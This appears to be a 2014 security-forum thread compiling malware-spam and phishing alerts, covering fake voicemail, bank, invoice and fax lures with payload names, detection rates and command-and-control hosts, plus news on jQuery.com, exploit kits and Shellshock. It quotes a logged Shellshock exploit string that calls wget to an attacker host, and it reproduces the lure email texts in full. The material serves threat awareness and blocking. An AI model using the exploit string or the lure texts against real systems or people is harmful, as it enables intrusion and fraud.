Fake 'Voice Mail' SPAM ...
FYI...
Fake 'Voice Mail' SPAM
- http://blog.dynamoo.com/2014/09/acco...-have-new.html
23 Sep 2014 - "This strangely titled spam leads to malware.
From: Voice Mail
Date: 23 September 2014 10:17
Subject: You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs8213783583_001
The transmission length was 78
Receiving machine ID : R8KU-UY0G3-ONGH
To download and listen your voice mail please follow the link ...
The link to this secure message will expire in 24 hours ...
The link in the email downloads a file from www .ezysoft .in/ocjnvzulsx/VoiceMail.zip which contains a malicious executable VoiceMail.scr which has a VirusTotal detection rate of 2/54*. According to this Anubis report** the malware attempts to phone home to very-english .co.uk which might be worth blocking."
* https://www.virustotal.com/en-gb/fil...is/1411464313/
** http://anubis.iseclab.org/?action=re...7a&format=html
- http://myonlinesecurity.co.uk/new-vo...e-pdf-malware/
23 Sep 2014 - "... 23 Sep 2014: VoiceMail.zip (9kb): Extracts to: VoiceMail.scr Current Virus total detections: 2/54*
* https://www.virustotal.com/en-gb/fil...is/1411464313/
___
jQuery.com compromised to serve malware via drive-by download
- http://www.net-security.org/malware_news.php?id=2869
23.09.2014 - "jQuery.com, the official website of the popular cross-platform JavaScript library of the same name, had been compromised and had been -redirecting- visitors to a website hosting the RIG exploit kit and, ultimately, delivering information-stealing malware. While any website compromise is dangerous for users, this one is particularly disconcerting because of the demographic of its users... The attack was first detected on September 18, and given that the malicious redirector was hosted on a domain that was registered on the same day, it's more than likely that that was the day when the attack actually started. RiskIQ researchers* have immediately notified the jQuery Foundation about the compromise, and the site's administrators have -removed- the malicious script. The bad news is that they still don't know how the compromised happened, so it just might happen again. Users who have visited the site on or around September 18 are advised to check whether they have been compromised by the malware. The researchers recommend immediately re-imaging of the system, resetting passwords for user accounts that have been used on it, and checking whether suspicious activity has originated from it (data exfiltration, etc.). The only good news in all of this is that there is no indication that the jQuery library was affected."
* http://www.riskiq.com/resources/blog...-accounts-risk
>> https://blog.malwarebytes.org/?s=RIG+exploit+kit
- https://isc.sans.edu/diary.html?storyid=18699
2014-09-23
46.182.31.77: https://www.virustotal.com/en/ip-add...7/information/
___
Nuclear Exploit Kit evolves, includes Silverlight Exploit
- http://blog.trendmicro.com/trendlabs...light-exploit/
Sep 23, 2014 - "... We observed that the Nuclear Exploit Kit exploit kit recently included the Silverlight exploit (CVE-2013-0074*) in its scope. We believe that the attackers behind the Nuclear Exploit Kit included Silverlight in its roster of targeted software for two reasons: to have an expanded attack surface and to avoid detection (as not many security solutions have detections for this particular exploit)... This particular exploit has also been used in other exploit kits, such as the Angler Exploit Kit... Microsoft has released a bulletin (Microsoft Security Bulletin MS13-022) to address the associated vulnerability... The number of exploits used by the kit has -doubled- since the start of 2014...
Timeline of exploits used by the Nuclear Exploit Kit:
> http://blog.trendmicro.com/trendlabs...imeline-01.jpg
Vulnerabilities targeted by the current Nuclear Exploit Kit:
> http://blog.trendmicro.com/trendlabs...ploit_fig4.png
... patches have already been released for the vulnerabilities targeted by the Nuclear Exploit Kit..."
* https://web.nvd.nist.gov/view/vuln/d...=CVE-2013-0074 - 9.3 (HIGH)
:mad: :fear::fear:
Fake BankLine, Voice mail, Invoice SPAM, AMEX Phish ...
FYI...
Fake BankLine SPAM
- http://blog.dynamoo.com/2014/09/you-...e-message.html
24 Sep 2014 - "This -fake- BankLine email leads to malware that is not currently detected by any anti-virus engine:
From: Bankline [secure.message@ bankline .com]
Date: 24 September 2014 09:59
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link bellow ...
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk ...
First time users - will need to register after opening the attachment...
The link in the email goes to ismashahalam .net/xyzpayohjx/ngkzoeqjjs.html which downloads an archive file from ismashahalam .net/xyzpayohjx/SecureMessage.zip. This in turn contains a malicious file SecureMessage.scr which has a VirusTotal detection rate of 0/50*. The Anubis report** shows that the malware phones home to very-english .co.uk which is worth blocking or monitoring."
* https://www.virustotal.com/en-gb/fil...is/1411546325/
** https://anubis.iseclab.org/?action=r...ef&format=html
- http://myonlinesecurity.co.uk/receiv...e-pdf-malware/
24 Sep 2014 - "... 24 Sep 2014: SecureMessage.zip: Extracts to: SecureMessage.scr
Current Virus total detections: 7/54*..."
* https://www.virustotal.com/en/file/2...is/1411565004/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
___
Fake Voice mail SPAM
- http://myonlinesecurity.co.uk/inclar...e-wav-malware/
24 Sep 2014 - "'Voice Message Attached from 01636605058 – name unavailable' pretending to come from voicemail@ inclarity .net is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Time: Sep 23, 2014 10:50:00 AM
Click attachment to listen to Voice Message
24 September 2014: 01636605058_20140919_105000.wav.zip: Extracts to: 01636605058_20140919_105000.wav.exe
Current Virus total detections: 12/53*
This 'Voice Message Attached from 01636605058 – name unavailable' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( (sound) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4...is/1411568872/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
___
Fake 'overdue invoice' SPAM – malware
- http://myonlinesecurity.co.uk/remind...voice-malware/
24 Sep 2014 - "'Reminder of overdue invoice' pretending to come from a random name at a random company and with a random named attachment is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... different subjects with this one having different numbers including:
Reminder of overdue invoice: 708872110964932
Overdue Payment: 122274492356288
Due Date E-Mail Reminder: 417785972641224
Payment reminder: 461929101577209
Past Due Reminder Letter: 199488661953143
Bills Reminder: 325332051074690
Automatic reminder: 676901889653218
Late payment: 475999033756578
Reminder: 215728756825356
The email looks like:
Hello,
This is Rex from Olympus Industrial. After a review of our records, we have found your account is past due.
Account ID: 5FCDMF9. This notice is a reminder your payment is due.
Regards,
Rex Gloeckler
Olympus Industrial...
24 September 2014: application_708872110964932_5FCDMF9.rar:
Extracts to: application_708872110964932_5FCDMF9.exe
Current Virus total detections: 3/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d...is/1411570178/
... Behavioural information
TCP connections
157.56.96.53: https://www.virustotal.com/en/ip-add...3/information/
213.186.33.19: https://www.virustotal.com/en/ip-add...9/information/
95.101.0.97: https://www.virustotal.com/en/ip-add...7/information/
213.186.33.17: https://www.virustotal.com/en/ip-add...7/information/
195.60.214.11: https://www.virustotal.com/en/ip-add...1/information/
___
Fake AMEX Phish - 'Home Depot Security concern'
- http://myonlinesecurity.co.uk/americ...epot-phishing/
24 Sep 2014 - "We are seeing quite a few American Express phishing attempts trying to get your American Express details. These are very well crafted and look identical to genuine American Express emails. The senders appear to be from American Express until you look carefully at the email headers. Do -not- click -any- links in these emails... Today’s version is the 'American Express – Security concern on Data breach at Home Depot' which is a change to previous versions to attempt to make it more believable and attractive for you to click the link & give your details. They are using the recent Home Depot hack and consequent fraudulent transactions* that are being taken from many victims accounts to scare you into ignoring the usual precautions and get you to give them your details:
* http://www.cnbc.com/id/102027452
Email looks like:
[ AMEX logo ]
Dear Customer:We are writing to you because we need to speak with you regarding a security concern on your account. The Home Depot recently reported that there was unauthorized access to payment data systems at its U.S. stores. American Express has put fraud controls in place and we continue to closely monitor the situation. Our records indicate that you recently used your American Express card on September 19, 2014.
We actively monitor accounts for fraud, and if we see unusual activity which may be fraud, our standard practice is to immediately contact our Card Members. There is no need to call us unless you see suspicious activity on your account.
To ensure the safety of your account , please log on to : ...
Regularly monitor your transactions online at americanexpress .com. If you notice fraudulent transactions, visit our online Inquiry and Dispute Center
Enroll in Account Alerts that notify you via email or text messages about potentially fraudulent activities.
Switch to Paperless Statements that are accessible online through your password-protected account.
Your prompt response regarding this matter is appreciated.
Sincerely,
American Express Identity Protection Team ...
Following the link in this 'American Express – Security concern on Data breach at Home Depot' or other -spoofed- emails takes you to a website that looks -exactly- like the real American Express site. You are then led through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your American Express account, but also your Bank Account, Email details, webspace (if you have it) They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. Please read our How to protect yourselves page** for simple, sensible advice on how to avoid being infected or having your details stolen by this sort of socially engineered malware..."
** http://myonlinesecurity.co.uk/how-to...hten-security/
- http://threattrack.tumblr.com/post/9...dentials-phish
Sep 24, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019...PiQ1r6pupn.png
Tagged: AMEX, American Express, Home Depot, Credentials Phish
___
Netcraft Sep 2014 Web Server Survey
- http://news.netcraft.com/archives/20...er-survey.html
24 Sep 2014 - "In the September 2014 survey we received responses from 1,022,954,603 sites — nearly 31 million more than last month. This is the first time the survey has exceeded a -billion- websites, a milestone achievement that was unimaginable two decades ago. Netcraft's first ever survey was carried out over 19 years ago in August 1995. That survey found only 18,957 sites, although the first significant milestone of one million sites was reached in less than two years, by April 1997..."
___
Viator(dot)com - Data Compromise ...
- https://blog.malwarebytes.org/online...-you-affected/
Sep 23, 2014 - "You may well be seeing an email appearing in your inbox from Viator .com, a website designed to help you find tours and trips overseas with none of the typical messing about such tasks usually involve. The emails have been sent out because it appears they had a breach* and anything up to 1.4 million customers may have been potentially impacted by the compromise...
* http://www.viator.com/about/media-ce...leases/pr33251
Sep 19, 2014
... the bad news is that the breach took place a good few weeks ago yet we’re only just hearing about it... there doesn’t appear to have been a massive file posted online yet containing data such as PII related to the compromise... we await more information on this latest high-profile attack."
___
Malvertising campaign - involving DoubleClick and Zedo
- https://blog.malwarebytes.org/malver...lick-and-zedo/
Sep 18, 2014
Update (09/19/14 9:20 AM PT): It appears that the malicious redirection has stopped. Last activity was detected by our honeypots around midnight last night, and nothing else since then. We are still monitoring the situation and will update here if necessary."
- http://arstechnica.com/security/2014...ched-millions/
Sep 22 2014
:mad: :fear:
Fake Bank transfers/invoice SPAM ...
FYI...
Fake Bank transfers/invoice SPAM ...
- http://blog.dynamoo.com/2014/09/malw...sfer-sage.html
25 Sep 2014 - "... very aggressive spam run this morning, with at least -four- different email formats pushing the -same- malicious download.
RBS / Riley Crabtree: "BACS Transfer : Remittance for JSAG814GBP"
From: Riley Crabtree [creditdepart@ rbs .co.uk]
Date: 25 September 2014 10:58
Subject: BACS Transfer : Remittance for JSAG814GBP
We have arranged a BACS transfer to your bank for the following amount : 4946.00
Please find details at our secure link ...
Sage Account & Payroll: "Outdated Invoice"
From: Sage Account & Payroll [invoice@ sage .com]
Date: 25 September 2014 10:53
Subject: Outdated Invoice
Sage Account & Payroll
You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link ...
Screenshot: https://1.bp.blogspot.com/-8Mx-CTYIi...1600/sage2.png
Lloyds Commercial Bank: "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 25 September 2014 11:36
Subject: Important - Commercial Documents
Important account documents
Reference: C400
Case number: 05363392
Please review BACs documents.
Click link below ...
NatWest Invoice: "Important - New account invoice
From: NatWest Invoice [invoice@ natwest .com]
Date: 25 September 2014 10:28
Subject: Important - New account invoice
Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
To view/download your invoice please click here ...
The links in the emails go to different download locations to make it harder to block... In each case the page then downloads the victim to download file Invoice_09252014.zip from the same directory as the html file. This ZIP file contains a malicious executable Invoice_09252014.scr which currently has a VirusTotal detection rate of 3/54*. The Anubis report shows that it phones home to ukrchina-logistics .com which is probably worth blocking or monitoring access to."
* https://www.virustotal.com/en-gb/fil...is/1411638249/
... Behavioural information
DNS requests
ukrchina-logistics .com
TCP connections
188.165.198.52: https://www.virustotal.com/en-gb/ip-...2/information/
91.196.0.119
- http://threattrack.tumblr.com/post/9...e-invoice-spam
Sep 25, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019...1ql1r6pupn.png
Tagged: Sage, Upatre
___
Fake BCA SPAM - PDF malware
- http://myonlinesecurity.co.uk/bca-ba...e-pdf-malware/
25 Sep 2014 - "'BCA Banking 24.09.14' pretending to come from hallsaccounts <hallsaccounts@ hallsgb .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Accounts Dept
Halls Holdings Ltd
Tel: 01743 450700
Fax: 01743 443759 ...
25 September 2014: BCA Banking 24.09.14.pdf.zip : Extracts to: BCA Banking 24.09.14.pdf.exe
Current Virus total detections: 4/53* . This BCA Banking 24.09.14 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an image of a barcode to try to fool you instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c...is/1411646762/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
___
Fake voice mail SPAM – wav malware
- http://myonlinesecurity.co.uk/outloo...e-wav-malware/
25 Sep 2014 - "'You have received a voice mail' pretending to come from Microsoft Outlook [no-reply@ Your domain] is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You received a voice mail : VOICE7838396453.wav (26 KB)
Caller-Id: 7838396453
Message-Id: ID9CME
Email-Id: [redacted]
This e-mail contains a voice message.
Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server
25 September 2014 VOICE7838396453.zip (56kb): Extracts to: voicemessage.scr
Current Virus total detections: 1/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav (sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c...is/1411657167/
... Behavioural information
TCP connections
23.21.52.195: https://www.virustotal.com/en/ip-add...5/information/
95.100.255.137: https://www.virustotal.com/en/ip-add...7/information/
194.150.168.70: https://www.virustotal.com/en/ip-add...0/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
___
Fake Gov't e-mail SCAM
- https://www.ic3.gov/media/2014/140924.aspx
Sep 24, 2014 - "Cybercriminals posing as Internet Crime Complaint Center (IC3) employees are defrauding the public. The IC3 has received complaints from victims who were receiving e-mails purported to be from the IC3... Victims report that the unsolicited e-mail sender is a representative of the IC3. The e-mails state that a criminal report was filed on the victim’s name and social security number and legal papers are pending. Scammers impersonate an IC3 employee to increase credibility and use threats of legal action to create a sense of urgency. Victims are informed they have one to two days from the date of the complaint to contact the scammers. Failure to respond to the e-mail will result in an arrest warrant issued to the victim. Some victims stated they were provided further details regarding the ‘criminal charges’ to include violations of federal banking regulations, collateral check fraud, and theft deception. Other victims claimed that their address was correct but their social security number was incorrect. Victims that requested additional information from the scammer were instructed to obtain prepaid money cards to avoid legal action. Victims have reported this -scam- in multiple states... If you receive this type of e-mail:
- Resist the pressure to act quickly.
- -Never- wire money based on a telephone request or in an e-mail, especially to an overseas location.
The IC3 -never- charges the public for filing a complaint and will -never- threaten to have them arrested if they do not respond to an e-mail..."
:fear::fear: :mad:
Amazon phish, Fake docs, voicemail, fax SPAM ...
FYI...
Amazon phish ...
- http://myonlinesecurity.co.uk/amazon...tion-phishing/
26 Sep 2014 - "'Account Confirmation' pretending to come from Amazon .co.uk <auto-confirm@ amazon .co.uk> is a phishing email designed to get your Amazon log in details and then your bank, credit card, address and personal details so they can imitate you and take over your accounts and clean you out...
Screenshot: http://myonlinesecurity.co.uk/wp-con...nfirmation.png
Following the link in this Amazon Account Confirmation or other spoofed emails takes you to a website that looks -exactly- like the real Amazon.co.uk site. You are then through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your Amazon account, but also your Bank Account, Email details, webspace (if you have it) They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them ..."
___
Fake docs, voicemail, fax SPAM ...
- http://blog.dynamoo.com/2014/09/malw...documents.html
26 Sep 2014 - "... different types of spam to increase click through rates and now some tricky tools to prevent analysis of the malware.
Employee Documents - Internal Use
From: victimdomain
Date: 26 September 2014 09:41
Subject: Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Employee Documents ...
Documents are encrypted in transit and store in a secure repository...
You have a new voice
From: Voice Mail [Voice.Mail@ victimdomain]
Date: 26 September 2014 09:30
Subject: You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs4004011004_001
The transmission length was 26
Receiving machine ID : ES7D-ZNA1D-QF3E
To download and listen your voice mail please follow the link ...
RBS: BACS Transfer : Remittance for JSAG244GBP
From: Douglas Byers [creditdepart@ rbs .co.uk]
Date: 26 September 2014 10:12
Subject: BACS Transfer : Remittance for JSAG244GBP
We have arranged a BACS transfer to your bank for the following amount : 4596.00
Please find details at our secure link ...
New Fax
From: FAX Message [fax@victimdomain]
Date: 26 September 2014 10:26
Subject: New Fax
You have received a new fax .
Date/Time: Fri, 26 Sep 2014 16:26:36 +0700.
Your Fax message can be downloaded here ...
... The attack has evolved recently.. usually these malicious links forwarded on to another site which had the malicious payload. Because all the links tended to end up at the same site, it was quite easy to block that site and foil the attack. But recently the payload is spread around many different sites making it harder to block. A new one today is that the landing page is somewhat obfuscated to make it harder to analyse, and this time the download is a plain old .scr file rather than a .zip. I've noticed that many anti-virus products are getting quite good at detecting the malicious ZIP files with a generic detection, but not the binary within. By removing the ZIP wrapper, the bad guys have given one less hook for AV engines to find.. malicious binary document7698124-86421_pdf.scr is downloaded from the remote site which has a VirusTotal detection rate of 2/55*. The Anubis report shows the malware attempting to phone home to padav .com which is probably worth blocking."
* https://www.virustotal.com/en-gb/fil...is/1411724904/
... Behavioural information
DNS requests
padav .com (184.106.55.51)
TCP connections
188.165.198.52: https://www.virustotal.com/en-gb/ip-...2/information/
184.106.55.51: https://www.virustotal.com/en-gb/ip-...1/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en-gb/ip-...1/information/
___
Bill.com Spam
- http://threattrack.tumblr.com/post/9.../bill-com-spam
Sep 26, 2014 - "Subjects Seen:
Payment Details [Incident: 711935-599632]
Typical e-mail details:
We could not process your Full Payment Submission. The submission for reference ***/UT5236489 was successfully received and was not processed. Check attached copy (PDF Document) for more information.
Regards,
Bill.com Payment Operations
Screenshot: https://gs1.wac.edgecastcdn.net/8019...HaW1r6pupn.png
Malicious File Name and MD5:
bill_com_Payment_Details_711935-599632.zip (02EE805D1EACD739BEF4697B26AAC847)
bill_com_payment_details_ID0000012773616632715381235.pdf.exe (AD24CD2E14DCBF199078BDBBAE4BF0CA)
Tagged: bill.com, Vawtrak
___
More Fakes - HMRC, BT, RBS SPAM
- http://blog.dynamoo.com/2014/09/malw...plication.html
26 Sep 2014 - "Another bunch of spam emails, with the same payload* at this earlier spam run*.
HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
From: noreply@ taxreg .hmrc .gov.uk [noreply@ taxreg .hmrc .gov.uk]
Date: 26 September 2014 12:26
Subject: HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
The application with reference number LZV9 0Q3E W5SD N3GV submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
Please download/view your HMRC documents here ...
Important - BT Digital File
From: Cory Sylvester [Cory.Sylvester@ bt .com]
Date: 26 September 2014 12:51
Subject: Important - BT Digital File
Dear Customer,
This email contains your BT Digital File. Please scan attached file and reply to this email.
To download your BT Digital File please follow the link ...
RBS Bankline: Outstanding invoice
From: Bankline.Administrator@ rbs .co.uk [Bankline.Administrator@ rbs .co.uk]
To: <REDACTED>
Date: 26 September 2014 13:05
Subject: Outstanding invoice
{_BODY_TXT}
Dear [redacted],
Please find the attached copy invoice which is showing as unpaid on our ledger.
To download your invoice please click here ...
In the sample I looked at the malware page downloaded an archive document26092014-008_pdf.zip which in turn contains document26092014-008_pdf.exe which is the same payload* as earlier..."
* http://blog.dynamoo.com/2014/09/malw...documents.html
___
Fake Barclays SPAM – PDF malware
- http://myonlinesecurity.co.uk/barcla...e-pdf-malware/
26 Sep 2014 - "'Barclays Transaction not complete' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Unable to complete your most recent Transaction. Currently your transaction has a pending status.
If the transaction was made by mistake please contact our customer service.
For more details please download payment receipt ...
26 September 2014: PaymentReceipt262.zip: Extracts to: PaymentReceipt262.exe
Current Virus total detections: 2/55* . This 'Barclays Transaction not complete' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5...is/1411738617/
... Behavioural information
DNS requests
wcdnitaly .org (195.110.124.133)
TCP connections
188.165.198.52: https://www.virustotal.com/en/ip-add...2/information/
195.110.124.133: https://www.virustotal.com/en/ip-add...3/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
:mad: :fear::fear:
Shellshock and MangoHost (mangohost .net) / 83.166.234.0/24
FYI...
Shellshock and MangoHost (mangohost .net) / 83.166.234.0/24
- http://blog.dynamoo.com/2014/09/evil...mangohost.html
28 Sep 2014 - "I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday... probing my server at attempting to WGET back to their own network to enumerate vulnerable hosts.
dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http ://ad.dipad .biz/test/http ://dynamoo .com/\""
ad.dipaz .biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133 which made me suspicious of the whole range... MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova*. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau. Until the past few days, MangoHost was hosting the -ransomware- sites listed here** [pastebin]. Paste customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode .com, whatever that may be (you can guarantee it is nothing good). Currently hosted domains include a collection of -fake- browser plugins, some -malvertising- sites, some porn, spam sites, hacker resources, -ransomware- domains and what might appear to be some fake Russian law firms... I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it."
(More detail at the dynamoo URL above.)
* https://en.wikipedia.org/wiki/Russians_in_Moldova
** http://pastebin.com/2mC1pXaJ
83.166.234.186: https://www.virustotal.com/en/ip-add...6/information/
83.166.234.133: https://www.virustotal.com/en/ip-add...3/information/
___
Shellshock in the Wild
- http://www.fireeye.com/blog/uncatego...-the-wild.html
Sep 27, 2014 - "... We have observed a significant amount of overtly malicious traffic leveraging BASH, including:
- Malware droppers
- Reverse shells and backdoors
- Data exfiltration
- DDoS
Some of this suspicious activity appears to be originating from Russia. We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it’s only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise... Exploitation Techniques: The Shellshock traffic we have been able to observe is still quite chaotic. It is largely characterized by high volume automated scans and PoC-like exploit scripts... payload is a very small ELF executable (md5: 959aebc9b44c2a5fdd23330d9be1101e) that was submitted to VirusTotal yesterday with 0 detections. It simply creates a reverse shell, connecting to the same IP the payload was downloaded from: 82.118.242.223... We will continue monitoring the threats and keep you updated..."
(More detail at the fireeye URL above.)
- http://www.symantec.com/connect/blog...-vulnerability
Updated: 29 Sep 2014 - "... Businesses, in particular website owners, are most at risk from this bug and should be aware that its exploitation may allow access to their data and provide attackers with a foothold on their network. Accordingly, it is of critical importance to apply any available patches immediately. Linux vendors have issued security advisories for the newly discovered vulnerability including patching information.
Debian: https://www.debian.org/security/2014/dsa-3032
Ubuntu: http://www.ubuntu.com/usn/usn-2362-1/
Red Hat: https://access.redhat.com/articles/1200223
CentOS: http://centosnow.blogspot.com/2014/0...-centos-5.html
Novell SUSE: http://support.novell.com/security/c...2014-6271.html
*Red Hat has updated its advisory to include fixes for a number of remaining issues.
- https://rhn.redhat.com/errata/RHSA-2014-1306.html
Last updated on: 2014-09-30
If a patch is unavailable for a specific distribution of Linux or Unix, it is recommended that users switch to an alternative shell until one becomes available.
For consumers: Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available.
Symantec Protection: Symantec has created an Intrusion Prevention signature for protection against this vulnerability:
27907 - OS Attack: GNU Bash CVE-2014-6271
> http://www.symantec.com/security_res...jsp?asid=27907
Symantec will continue to investigate this vulnerability and provide more details as they become available."
:fear::fear: :mad:
Fake SITA, Invoice, Bank SPAM
FYI...
Fake SITA SPAM - PDF malware
- http://myonlinesecurity.co.uk/sita-u...e-pdf-malware/
29 Sep 2014 - "'Remittance Advice !!!' pretending to come from SITA UK < info @sita .co.uk > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please find attached folder for remittance advice and your outstanding statement from SITA UK.
Please arrange to send over a credit note as indicated in the statement.
Best Regards,
Luis Shivani,
Financial Controller
SITA UK ...
Update: a slightly revised email coming out now but still the -same- malware attachment
Please find attached folder for remittance advice and your outstanding statement from SITA UK.
Please arrange to send over a credit note as indicated in statement.
Any queries please contact us on 01934-524004.
Best Regards,
Luis Shivani,
Financial Controller
SITA UK ...
29 September 2014: Remittance-Advice.zip: Extracts to: Remittance-Advice.exe
Current Virus total detections: 39/55* . This 'Remittance Advice !!!' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d...is/1411951945/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
___
Fake Invoice SPAM - XLS malware
- http://myonlinesecurity.co.uk/invoic...e-xls-malware/
29 Sep 2014 - "'Your Invoice from Complete Office Solutions' pretending to come from donotreply@ c-o-s .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Hi Please find attached your recent invoices/credits from Complete Office Solutions, if you have any queries please do not hesitate in contacting us on 01904 693696 or email on Julie.edkins@ wallisbusinessservices .co.uk
29 September 2014: A Sales Invoice – By Account_SINV0612471.PDF.zip : Extracts to: A Sales Invoice – By Account_SINV0612471.xls.exe
Current Virus total detections: 25/54* . This 'Your Invoice from Complete Office Solutions' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a...is/1411980639/
... Behavioural information
TCP connections
82.165.38.206: https://www.virustotal.com/en/ip-add...6/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
___
Fake Bank SPAM - leads to malware
- http://blog.dynamoo.com/2014/09/malw...cial-bank.html
29 Sep 2014 - "Two -different- banking spams this morning, leading to the same malware:
Lloyds Commercial Bank "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 29 September 2014 11:03
Subject: Important - Commercial Documents
Important account documents
Reference: C947
Case number: 18868193
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file) ...
HSBC Bank UK "Payment Advice Issued"
From: HSBC Bank UK
Date: 29 September 2014 11:42
Subject: Payment Advice Issued
Your payment advice is issued at the request of our customer. The advice is for your reference only.
Please download your payment advice at ...
The link in the email goes through a script and then downloads a file document_8641_29092014_pdf.scr (this time without a ZIP wrapper) which has a VirusTotal detection rate of just 1/55*. The Anubis report shows that the malware attempts to phone home to cuscorock .com which is probably a good thing to -block- or monitor."
* https://www.virustotal.com/en-gb/fil...e28b/analysis/
... Behavioural information
DNS requests
cuscorock .com (184.154.253.181)
formatech .es (81.88.48.71)
TCP connections
184.154.253.181: https://www.virustotal.com/en/ip-add...1/information/
81.88.48.71: https://www.virustotal.com/en/ip-add...1/information/
188.165.198.52: https://www.virustotal.com/en/ip-add...2/information/
___
Fake Order SPAM
- http://myonlinesecurity.co.uk/order-...61864-malware/
29 Sep 2014 - "'Order statsus: Order confirmation: 9618161864' coming from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Lots of different subjects for this email . All subjects have a random number involved and some have bad spelling mistakes, including:
- Order statsus: Order confirmation: 9618161864
- Order info: 32257958734
- Payment status: 93612666937
- Payment info: 21714421631
- Payment confirmation: 27863161481
The email looks like ( slightly different versions all with different names and phone numbers and companies):
Greetings,
Your order #9618161864 will be shipped on 01.10.2014.
Date: September 29, 2014. 12:12pm
Price: £156.77
Transaction number: 9AECB76F37D22F21
Please find the detailed information on your purchase in the attached file order_2014_09_29_9618161864.zip
Kind regards,
Sales Department
Tiana Haggin ...
Date: order_2014_09_29_9618161864.zip: Extracts to: sale_2014_09_29_73981861092.exe
